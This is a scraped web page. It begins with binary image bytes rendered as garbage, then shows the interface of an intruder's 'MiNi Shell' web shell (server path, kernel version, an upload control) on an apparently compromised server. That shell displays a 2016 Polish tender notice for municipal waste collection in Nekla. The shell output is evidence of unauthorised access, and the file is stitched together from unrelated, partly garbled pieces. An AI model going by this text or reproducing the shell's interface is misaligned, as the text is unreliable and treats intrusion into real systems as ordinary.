JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160415/93158-N-2016.html

<p class="kh_header"><b>Nekla: Odbiór i transport odpadów komunalnych od włascicieli nieruchomości zamieszkałych na terenie Miasta i Gminy Nekla</b><br>
<b>Numer ogłoszenia: 93158 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Nekla , ul. Dworcowa 10, 62-330 Nekla, woj. wielkopolskie, tel. 061 4386011, faks 061 4386490.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.nekla.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i transport odpadów komunalnych od włascicieli nieruchomości zamieszkałych na terenie Miasta i Gminy Nekla.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: 
a)odbiór i transport wskazanych w opisie zamówienia odpadów komunalnych od właścicieli nieruchomości zamieszkałych na terenie Miasta i Gminy Nekla,
b)odbiór i transport odpadów z koszy ulicznych zlokalizowanych na terenie Miasta i Gminy Nekla,
c)odbiór i transport odpadów zlokalizowanych na terenach gminnych,
d)usuwanie odpadów z miejsc wskazanych przez Zamawiającego, a zlokalizowanych na terenie miasta i gminy Nekla,
e)przekazywanie odebranych odpadów komunalnych do stacji przeładunkowej zlokalizowanej w miejscowości Bardo gm. Września, funkcjonującej w ramach Regionalnej Instalacji Przetwarzania Odpadów Komunalnych w Lulkowie,
f)udostępnienie worków na odpady zbierane selektywnie do nieruchomości zabudowanych domami jednorodzinnymi w okresie trwania zamówienia,
g)dbałość o należyty stan sanitarny, porządkowy i techniczny pojemników, kontenerów, worków oraz gniazd.

2.Charakterystyka Gminy Nekla:
a)powierzchnia gminy wynosi 96,24 km2,
b)liczba mieszkańców na terenie Gminy Nekla wynosi 7 345 osób (stan na dzień 31.12.2015 r.),
c)obecnie na terenie miasta mieszka 3 638 osób, natomiast na wsi 3 707 osób,
d)szacuje się, że ok. 991 osób mieszka w zabudowie wielorodzinnej i ok. 6 354 osób w zabudowie jednorodzinnej,
e)szacowana ilość budynków wielorodzinnych: na wsi 38, w mieście 11,
f)szacowana ilość budynków jednorodzinnych: na wsi 728, w mieście 970,
g)liczba gospodarstw, które zadeklarowały segregację odpadów wynosi 1 597, natomiast liczba gospodarstw, które zadeklarowały odbiór z posesji odpadów biodegradowalnych wynosi 664,
h)gmina liczy 15 sołectw: Barczyzna, Chwałszyce, Gąsiorowo, Gierłatowo, Kokoszki, Mała Górka, Nekielka, Opatówko, Podstolice, Racławki, Starczanowo, Stępocin, Stroszki, Targowa Górka, Zasutowo.
3.Szczegółowy opis przedmiotu zamówienia:
3.1Zamówienie obejmuje odbiór wskazanych w opisie zamówienia rodzajów odpadów komunalnych od właścicieli nieruchomości zamieszkałych w Gminie Nekla. Ilość wytworzonych na terenie miasta i gminy Nekla odpadów nie jest zależna od Zamawiającego. Ustalone ilości są szacunkowe i mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego uwzględniając ilość odpadów wytworzonych przez producentów. Szacunkowa ilość odpadów przewidzianych do zbiórki i transportu wynosi 2 747 Mg/12 miesięcy. 

Na określoną powyżej szacunkową ilość odpadów składają się:
a)odpady komunalne zmieszane					  2 102 Mg/12 miesięcy
b)tworzywa sztuczne						     95 Mg/12 miesięcy
c)szkło								     69 Mg/12 miesięcy
d)papier i tektura						     65 Mg/12 miesięcy
e)odpady biodegradowalne					    130 Mg/12 miesięcy
f)beton i gruz							     50 Mg/12 miesięcy
g)kosze uliczne							     25 Mg/12 miesięcy
h)odpady z terenów gminnych		   			     25 Mg/12 miesięcy
i)wielkogabarytowe i zużyty sprzęt	   			    126 Mg/12 miesięcy
j)usuwanie odpadów z miejsc wskazanych przez Zamawiającego	     60 Mg/12 miesięcy
 						          RAZEM   2 747 Mg/12 miesięcy

Podane wyżej ilości odpadów należy traktować jako orientacyjne i Wykonawcy nie przysługuje prawo do dodatkowego wynagrodzenia i/lub odszkodowania za osiągnięcie innych wielkości.

3.1.1	Niesegregowane (zmieszane) odpady komunalne

Kod odpadów:	
20 03 01 - niesegregowane odpady komunalne

System odbioru odpadów:
- zabudowa jednorodzinna: pojemnikowy,
- zabudowa wielorodzinna: kontenerowo - pojemnikowy.
Rodzaj pojemników do gromadzenia zmieszanych odpadów komunalnych:
- zabudowa jednorodzinna: 120 l (0,12 m3), 240 l (0,24 m3), 360 l (0,36 m3),
- zabudowa wielorodzinna: 1 100 l (1,1 m3), KP-5 (5 m3), KP-7 (7 m3).

Częstotliwość odbioru odpadów:
Odpady komunalne zmieszane odbierane będą z terenu nieruchomości raz na dwa tygodnie.

3.1.2	Odpady selektywnie zbierane u źródła

Kody odpadów: 
20 01 02 - szkło	  
15 01 02 - tworzywa sztuczne (bez styropianu)
15 01 04 - opakowania z metali
15 01 05 - opakowania wielomateriałowe
20 01 01 - papier
20 02 01 - odpady ulegające biodegradacji

System odbioru odpadów:
- zabudowa jednorodzinna: workowy,
- zabudowa wielorodzinna: kontenerowo - pojemnikowy.

Rodzaj worków, pojemników i kontenerów do gromadzenia odpadów selektywnie zbieranych:
a) zabudowa jednorodzinna:
Wprowadza się trzy rodzaje worków:
- worki koloru zielonego - na odpady ze szkła,
- worki koloru bezbarwny - na odpady z papieru, tektury, tworzywa sztucznego, metalu, opakowaniowe opakowania wielomateriałowe,
- worki koloru brązowego - na odpady zielone i ulegające biodegradacji.
b)zabudowa wielorodzinna:
Na terenie zabudowy wielorodzinnej wspólnoty mają obowiązek wyposażyć nieruchomość w specjalne gniazda do zbiórki trzech frakcji odpadów (szkło, odpady zielone i ulegające biodegradacji, oraz odpady z papieru, metalu tworzywa sztucznego, opakowania ulegające biodegradacji i opakowania wielomateriałowe). 

Worki na odpady selektywnie zbierane zapewnia i dostarcza do właścicieli nieruchomości Wykonawca. Natomiast wyposażenie gniazd w pojemniki i kontenery należy do właściciela nieruchomości.

Częstotliwość odbioru odpadów:
Zarówno na terenie miasta jak i gminy Nekla odbiór odpadów następować będzie z terenu nieruchomości raz w miesiącu, ale przerwa między odbiorami odpadów nie może być dłuższa niż 33 dni. 
Wyjątki:
- odbiór odpadów z papieru, tektury, metalu, z tworzywa sztucznego oraz opakowań wielomateriałowych, w okresie od 1 czerwca do 31 sierpnia następować będzie dwa razy w miesiącu, raz na dwa tygodnie. 
- odbiór odpadów biodegradowalnych z terenu nieruchomości następować będzie jedynie w okresie od 1 kwietnia do  30 listopada z częstotliwością raz na dwa tygodnie.
Odbiór odpadów odbywać się będzie zgodnie z harmonogramem odbioru odpadów ustalonym przez podmiot odbierający odpady (Wykonawcę) i zatwierdzonym przez Zamawiającego. 

UWAGA:
Odbiór odpadów biodegradowalnych z terenu nieruchomości odbywać się będzie w workach, natomiast Wykonawca zobowiązany jest dostarczyć odebrane odpady biodegradowalne do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych w Lulkowie luzem, bez worków. 

Parametry worków na odpady zbierane w sposób selektywny przez właścicieli nieruchomości zamieszkałych w zabudowie jednorodzinnej:

- Worki do selektywnej zbiórki szkła
materiał	folia polietylenowa LDPE, półprzeźroczysta
pojemność	80 litrów
kolor 		zielony
grubość 	minimum 50 mikronów
wymiary		50 cm x 100 cm (w tym zakładki po 10 cm)
nadruk		jednostronny o treści uzgodnionej pomiędzy Wykonawcą a Zamawiającym, nadruk winien zawierać informację, co wolno w danym worku segregować oraz jakich odpadów nie wolno segregować, wykonany techniką trwałą, czytelnie, wielkość nadruku winna odpowiadać wielkości umożliwiającej czytelność napisu, napis SZKŁO 

- Worki do selektywnej zbiórki papieru, metalu, tworzyw sztucznych, opakowań wielomateriałowych, odpadów opakowaniowych ulegających biodegradacji

materiał	folia polietylenowa LDPE, półprzeźroczysta
pojemność	120 litrów
kolor		bezbarwny
grubość		minimum 20 mikronów
wymiary		70 cm x 110 cm (w tym zakładki po 10 cm)
nadruk		jednostronny o treści uzgodnionej pomiędzy Wykonawcą a Zamawiającym, nadruk winien zawierać informację, co wolno w danym worku segregować oraz jakich odpadów nie wolno segregować, wykonany techniką trwałą, czytelnie, wielkość nadruku winna odpowiadać wielkości umożliwiającej czytelność napisu, napis PAPIER, METAL, PET, OPAKOWANIA

- Worki do selektywnej zbiórki odpadów zielonych i ulegających biodegradacji

materiał	folia polietylenowa LDPE, półprzeźroczysta
pojemność	240 litrów
kolor		brązowy
grubość		minimum 60 mikronów
wymiary		minimalnie 70 cm x 110 cm (w tym zakładki po 10 cm)
nadruk		jednostronny o treści uzgodnionej pomiędzy Wykonawcą a Zamawiającym, nadruk winien zawierać informację, co wolno w danym worku segregować oraz jakich odpadów nie wolno segregować, wykonany techniką trwałą, czytelnie, wielkość nadruku winna odpowiadać wielkości umożliwiającej czytelność napisu, napis BIODEGRADOWALNE
Uwaga:
Wszelkiego rodzaju tacki, folie i inne opakowania z tworzyw sztucznych służące do pakowania produktów spożywczych (mięso, warzywa itp.) oraz mające bezpośrednią styczność z artykułami spożywczymi mogą być uznane za odpady komunalne z kodu 20.

3.1.3	Odpady wielkogabarytowe oraz zużyty sprzęt elektryczny i elektroniczny

Kody odpadów		
20 03 07	- odpady wielkogabarytowe
20 01 23	- urządzenia zawierające freony
20 01 35	- zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21 i 20 01 23 zawierające niebezpieczne składniki
20 01 36 	- zużyte urządzenia elektryczne i elektroniczne inne niż wymienione w 20 01 21, 20 01 23 i 20 01 35
16 01 03 	- zużyte opony
17 01 01 	- odpady betonu oraz gruz betonowy z rozbiórki i remontów

System oraz częstotliwość odbioru odpadów:
Odpady wielkogabarytowe, wyeksploatowany sprzęt elektryczny oraz elektroniczny, zużyte opony i odpady betonu oraz gruz betonowy z rozbiórki i remontów odbierane będą raz w roku z terenu nieruchomości w drugim kwartale roku. Ponadto w trakcie całego roku odpady wielkogabarytowe, opony, gruz i wyeksploatowany sprzęt elektryczny oraz elektroniczny można bezpłatnie przekazać do Gminnego Punktu Selektywnej Zbiórki Odpadów Komunalnych zlokalizowanego na terenie oczyszczalni ścieków przy ulicy Nad Maskawą 5 w Nekli. Transport odpadów do GPSZOK mieszkańcy zapewniają we własnym zakresie i na własny koszt. Informacje o lokalizacji oraz godzinach otwarcia GPSZOK gmina podaje poprzez ogłoszenia na tablicach ogłoszeniowych, na stronie internetowej Urzędu Miasta i Gminy Nekla oraz w miesięczniku Przegląd Nekielski. Ponadto Wykonawca na zgłoszenie droga mailową przez Zamawiającego lub zarządcy GPSZOK dokona odbioru odpadów zgromadzonych w GPSZOK (nie rzadziej niż raz w miesiącu, nie częściej niż dwa razy w miesiącu). Czas reakcji przez Wykonawcę na zgłoszenie, nie może być dłuższy niż 48 godziny.
Jednocześnie Zamawiający zastrzega, że jednokrotne zgłoszenie odbioru odpadów zgromadzonych w GPSZOK może dotyczyć jednego kontenera, ale może również dotyczyć kilku lub wszystkich kontenerów znajdujących się w GPSZOK. 

3.2	Ustalenia organizacyjne związane z wykonaniem zamówienia i wymagania stawiane Wykonawcy:

3.2.1	Wykonawca zobowiązuje się do wykonywania usługi z należytą starannością, rozumianą jako staranność profesjonalisty w działalności objętej przedmiotem niniejszego zamówienia, w oparciu o aktualne unormowania prawne, zgodnie z obowiązującymi standardami oraz etyką zawodową.
3.2.2	Wykonawca będzie wykonywał usługę stanowiącą przedmiot niniejszego zamówienia przy użyciu narzędzi i sprzętu, który w szczególności winien spełniać wymagania wynikające z obowiązujących polskich norm przenoszących normy europejskie i aprobat technicznych polskich bądź europejskich, utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń do odbierania odpadów komunalnych, spełnienia wymagań technicznych dotyczących wyposażenia pojazdów do odbierania odpadów komunalnych; zapewnienie, dla właściwej realizacji przedmiotu zamówienia, przez cały czas trwania umowy dostatecznej ilości środków technicznych, gwarantujących terminowe i jakościowe wykonania przedmiotu zamówienia.
3.2.3	Wykonawca ponosi pełną odpowiedzialność wobec Zamawiającego i osób trzecich za szkody na mieniu i zdrowiu osób trzecich, powstałe podczas oraz w związku z realizacją przedmiotu zamówienia.
3.2.4	Wykonawca zobowiązuje się do odbioru odpadów sprzed posesji. Ustala się, iż maksymalna odległość wystawionego pojemnika i/lub worków na odpady zmieszane jak i segregowane od granicy działki posesji sprzed, której następować będzie odbiór odpadów, nie może być większa niż 5 metrów.
3.2.5	Jednocześnie Zamawiający zastrzega sobie możliwość wskazania posesji (maksymalnie 5 przypadków), gdzie odbiór odpadów odbywać się będzie bezpośrednio z terenu posesji mieszkańca.
3.2.6	Wykonawca zobowiązany jest do zwrotu pojemnika i/lub pozostawienia czystych, pustych worków po dokonaniu odbioru odpadów, w to samo miejsce tj. przed posesję (maksymalnie na odległość 5 m od granicy działki posesji).
3.2.7	Zamawiający wymaga, aby pojazdy odbierające odpady były wyposażone w urządzenia rejestrujące trasę i godzinę odbioru odpadów sprzed poszczególnych posesji. Zamawiający zastrzega sobie, aby Wykonawca na każde żądanie udostępnił posiadane nagrania z wideo rejestratorów bądź wydruki z GPS. Ponadto Wykonawca zobowiązany jest do przekazania Zamawiającemu hasła dostępu do systemu GPS monitorowania pozycji pojazdów wykorzystywanych w realizacji niniejszego zamówienia.
3.2.8	Wykonawca jest zobowiązany do porządkowania terenu zanieczyszczonego odpadami i innymi zanieczyszczeniami wysypanymi z pojemników, kontenerów, worków, pojazdów w trakcie realizacji usługi wywozu.
3.2.9	Wykonawca jest zobowiązany do zbierania odpadów leżących luzem obok zapełnionych pojemników, kontenerów oraz doprowadzenia do porządku terenów przyległych, zanieczyszczonych na skutek przepełnienia wymienionych urządzeń do gromadzenia odpadów, obowiązek ten winien być realizowany niezwłocznie po opróżnieniu pojemników, kontenerów.
3.2.10	Wykonawca jest zobowiązany do odbioru wszystkich odpadów wystawionych przed nieruchomość. Zamawiający wymaga, aby Wykonawca odbierał wszystkie wystawione odpady, również zgromadzone w innych workach niż dostarczane przez Wykonawcę, jeżeli posiadają oznaczenie o rodzaju znajdującego się w nim odpadu. 
Wykonawca zobowiązany jest do dostarczania każdorazowo przy odbiorze odpadów zbieranych selektywnie do każdej nieruchomości zabudowanej worków dla każdej frakcji odpadów w ilościach:
- szkło (zielony) - po 1 sztuce,
- papier, tektura, tworzywa sztuczne, metal, opakowania wielomateriałowe (bezbarwny) - po 4 sztuki,
- odpady ulegające biodegradacji (brązowy) - po 2 sztuki (przez cały okres obowiązywania zamówienia).
3.2.11	Odbiór odpadów winien odbywać się zgodnie z zasadą, iż odbiór w danej miejscowości odbywa się zawsze w tym samym dniu tygodnia. Szczegółowy harmonogram winien być ustalony w porozumieniu z Zamawiającym.
3.2.12	Zakazuje się Wykonawcy mieszania selektywnie zebranych odpadów komunalnych ze zmieszanymi odpadami komunalnymi odbieranymi od właścicieli nieruchomości zamieszkałych na terenie Gminy Nekla. 
3.2.13	Wykonawca jest obowiązany do realizacji reklamacji (nieodebranie z nieruchomości odpadów zgodnie z harmonogramem, niepozostawienie worków na odpady segregowane itp.) w przeciągu 24 godzin od otrzymania zawiadomienia e-mailem od Zamawiającego. Załatwienie reklamacji należy niezwłocznie potwierdzić e-mailem do Zamawiającego.
3.2.14	Wykonawca jest obowiązany naprawiać lub ponosić koszty naprawy (wg wyboru Zamawiającego) szkód wyrządzonych w majątku Gminy i osób trzecich podczas wykonywania usługi wywozu odpadów komunalnych w Gminie (uszkodzenia chodników, punktów składowania odpadów, ogrodzeń, wjazdów itp.).
3.2.15	Wykonawca zobowiązany jest kontrolować realizowane przez właściciela nieruchomości obowiązki w zakresie selektywnego zbierania odpadów komunalnych, a w przypadku jego niedopełnienia, Wykonawca Zobowiązany jest przyjąć odpady jako zmieszane odpady komunalne i pisemnie powiadomić o tym Zamawiającego, niezwłocznie, lecz nie później niż w ciągu 2 dni. Do zawiadomienia Wykonawca musi załączyć protokół ze zdarzenia i dokumentację fotograficzną. Z dokumentacji musi jednoznacznie wynikać, jakiej nieruchomości dotyczy, w jakim dniu i o jakiej godzinie doszło do ww. zdarzenia.
3.2.16	System odbierania odpadów komunalnych nie obejmuje odpadów powstających w wyniku prowadzenia działalności gospodarczej oraz nieruchomości niezamieszkałych.
3.2.17	Wykonawca jest zobowiązany do ważenia wszystkich odebranych odpadów komunalnych na legalizowanej wadze. Wykonawca jest zobowiązany do bieżącego prowadzenia ilościowej i jakościowej ewidencji odpadów zgodnie z przepisami ustawy o odpadach oraz ustawy o utrzymaniu czystości i porządku w gminach i udostępnienia Zamawiającemu możliwości wglądu do ww. dokumentacji.
3.2.18	Wykonawca zobowiązany jest do prowadzenia dokumentacji związanej z działalnością objętą zamówieniem tj. sporządzanie oraz przekazanie Zamawiającemu kwartalnych sprawozdań w terminie do końca miesiąca następującego po kwartale, którego dotyczy, przygotowanych na wzorach określonych w Rozporządzeniu Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi (Dz.U.2012.630).
3.2.19	Wykonawca zobowiązany jest do prowadzenia i przekazywania co miesiąc Zamawiającemu ewidencji nieruchomości, z których zostały odebrane zmieszane i selektywnie zebrane odpady, z podaniem informacji czy mieszkańcy segregują odpady. Wykaz nieruchomości znajdujących się na terenie miasta i gminy Nekla stanowi załącznik nr 6 do siwz.
3.2.20	Wykonawca zobowiązany jest do przekazywania odebranych odpadów komunalnych od właścicieli nieruchomości zamieszkałych do stacji przeładunkowej zlokalizowanej w miejscowości Bardo gm. Września, funkcjonującej w ramach Regionalnej Instalacji Przetwarzania Odpadów Komunalnych w Lulkowie.
3.2.21	Wszelkie faktury wystawione przez Zarządzającego RIPOK-iem, za odpady odebrane z nieruchomości zamieszkałych na terenie miasta i gminy Nekla będzie regulował Zamawiający.
3.2.22	Najpóźniej na 7 dni przed rozpoczęciem realizacji zamówienia Wykonawca dostarczy Zamawiającemu harmonogram odbioru odpadów w poszczególnych miejscowościach obowiązujący w I półroczu 2017 roku oraz wykaz liczby nieruchomości objętych zbiórką w poszczególnych miejscowościach. Kolejne harmonogramy odbioru odpadów w poszczególnych miejscowościach, obejmujące minimum 6 kolejnych miesięcy, Wykonawca będzie przekazywał Zamawiającemu najpóźniej na 21 dni przed rozpoczęciem miesiąca, od którego niniejszy harmonogram będzie obowiązywał.
3.2.23	Wykonawca jest zobowiązany skonsultować harmonogram odbioru odpadów z Zamawiającym.
3.2.24	Zamawiający i Wykonawca wspólnie odpowiadają za informowanie mieszkańców o harmonogramie odbierania poszczególnych rodzajów odpadów. W tym celu Wykonawca będzie sporządzać harmonogramy odbioru, które Zamawiający będzie po aktualizacji publikował na stronie internetowej www.nekla.eu, a Wykonawca w formie wydruków, będzie zobowiązany przekazać właścicielom nieruchomości podczas pierwszego odbioru odpadów.
3.2.25	Usługa będzie wykonywana w dni robocze od poniedziałku do piątku w godzinach od 07:00 do 19:00 oraz w razie potrzeby w soboty od godziny 08:00 do 13:00.
3.2.26	Zamawiający przewiduje, że odbiór odpadów z koszy ulicznych na terenie miasta i gminy Nekla następować będzie raz na miesiąc. Wyjątkiem są kosze usytuowane w centrum Nekli w ilości 20 sztuk (wzdłuż ul. Dworcowej od ronda przy posesji nr 5 do parkingu przy nieruchomości Rynek 21, dalej Rynek 1, ul. Poznańska do przystanku autobusowego, dodatkowo ul. Parkowa przy nieruchomości nr 1, ul. Zawodzie przy fontannie, ul. Chopina przy targowisku), które w sezonie wiosenno - letnim (od 1 kwietnia do 30 września) należy odbierać raz na tydzień, natomiast w sezonie od 1 października do 31 marca należy odbierać raz na dwa tygodnie. Dodatkowo w uzasadnionych przypadkach, odbiór odpadów z koszy ulicznych  będzie następował na każde wezwanie Zamawiającego (max 5 razy w całym okresie realizacji zamówienia). Określa się, iż szacunkowa ilość koszy wynosi 85 sztuk.
3.2.27	Odbiór odpadów zlokalizowanych na terenach gminnych odbywać się będzie dwa razy w miesiącu (minimum z 10-dniowym odstępem między odbiorami). Zamawiający określa, iż szacunkowa ilość kontenerów wynosi 3 sztuk wielkości 1100 l.
3.2.28	Wykonawca zobowiązany jest do usuwania odpadów z miejsc wskazanych przez Zamawiającego, a zlokalizowanych na terenie miasta i gminy Nekla na każde wezwanie/zgłoszenie Zamawiającego. Ustala się, iż czas reakcji i wykonania usługi nie może być dłuższy niż 48 godzin od zgłoszenia. Zamawiający szacuje, iż w okresie realizacji zamówienia będzie nie więcej niż 10 ww. wezwań/zgłoszeń.

3.3	Wyposażenie GPSZOK w pojemniki

Wykonawca zobowiązany jest wyposażyć na czas realizacji zamówienia GPSZOK w następujące pojemniki:

- min. poj. 7-10 m3 	2 szt. - odpady budowlane i rozbiórkowe (odpady 170101 i 170107),
- min. poj. 7 m3	1 szt. - odpady biodegradowalne, 
- min. poj. 10 m3	1 szt. - odpady wielkogabarytowe,
- min. poj. 7 m3	1 szt. odpady zmieszane,
- min. poj. 7 m3	1 szt. - zużyte opony, 
- min. poj. 7-10 m3	1 szt. - zużyty sprzęt elektryczny i elektroniczny.

Wykonawca na zgłoszenie drogą mailową przez Zamawiającego lub zarządcy GPSZOK dokona odbioru odpadów zgromadzonych w GPSZOK (nie rzadziej niż raz w miesiącu, nie częściej niż dwa razy w miesiącu). Czas reakcji przez Wykonawcę na zgłoszenie, nie może być dłuższy niż 48 godziny.
Jednocześnie Zamawiający zastrzega, że jednokrotne zgłoszenie odbioru odpadów zgromadzonych w GPSZOK może dotyczyć jednego kontenera, ale może również dotyczyć kilku lub wszystkich kontenerów znajdujących się w GPSZOK. 

3.4	Worki na odpady zbierane selektywnie.

Worki na selektywnie zbierane odpady zapewnia Wykonawca. Wykonawca podczas odbioru od mieszkańców odpadów zbieranych selektywnie będzie dostarczał mieszkańcom odpowiednie rodzaje worków:
- na szkło - raz w miesiącu po 1 sztuce,
- na papier, tekturę, metal, PET, opakowania wielomateriałowe - raz w miesiącu po 4 sztuki, wyjątkiem jest okres od czerwca do sierpnia, w którym worki dostarczane będą raz na dwa tygodnie po 4 sztuki, 
- na odpady biodegradowalne - raz na dwa tygodnie po 2 sztuki w okresie odbierania odpadów, tj. od kwietnia do listopada, natomiast w pozostałych miesiącach tj. styczeń - marzec oraz w grudniu, kiedy odpady nie są odbierane, worki dostarczane będą w ilości po 2 sztuki razem z workami na papier, tekturę, metal, PET i opakowania wielomateriałowe.

